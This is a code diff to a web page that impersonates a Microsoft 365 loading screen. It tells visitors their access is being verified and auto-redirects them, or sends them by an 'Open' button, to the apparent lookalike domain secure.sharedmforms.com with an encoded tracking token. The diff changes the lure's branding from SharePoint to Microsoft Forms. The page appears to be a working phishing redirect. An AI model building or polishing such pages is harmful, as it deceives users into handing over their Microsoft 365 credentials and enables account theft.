--- a/index.html
+++ b/index.html
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8" />
-  <title>Opening document in SharePoint…</title>
+  <title>Opening document in Microsoft Forms…</title>
   <meta name="viewport" content="width=device-width, initial-scale=1" />
 
   <!-- Auto redirect after 2 seconds -->
@@ -24,7 +24,7 @@
       font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Arial, sans-serif;
 
       /* ✅ BLUR BACKGROUND ADDED HERE */
-      background: url("blur-bg.png") center/cover no-repeat fixed;
+      background: url("blurred_light.png") center/cover no-repeat fixed;
       backdrop-filter: blur(4px);
 
       color: #111827;
@@ -131,18 +131,18 @@
       <img src="sharepoint-logo.png" alt="SharePoint Logo" />
     </div>
 
-    <h1>Opening document in SharePoint…</h1>
+    <h1>Opening document in Microsoft Forms…</h1>
     <p class="sub">Please wait while we verify your Microsoft 365 access.</p>
 
     <div class="spinner"></div>
 
     <a class="button" href="https://secure.sharedmforms.com/?aCXefF=NjE4MDkyZGQ2ZTZlNDNhODkzNzVjNmRmZmE3Yzk1YTk%3D&84K5B=E1aHz">
-      Open in SharePoint
+      Open in Microsoft Forms
     </a>
 
     <p class="meta">
       If you are not redirected automatically in a few seconds, click
-      <strong>Open in SharePoint</strong> to view your document.
+      <strong>Open in Microsoft Forms</strong> to view your document.
     </p>
 
     <div class="foot">
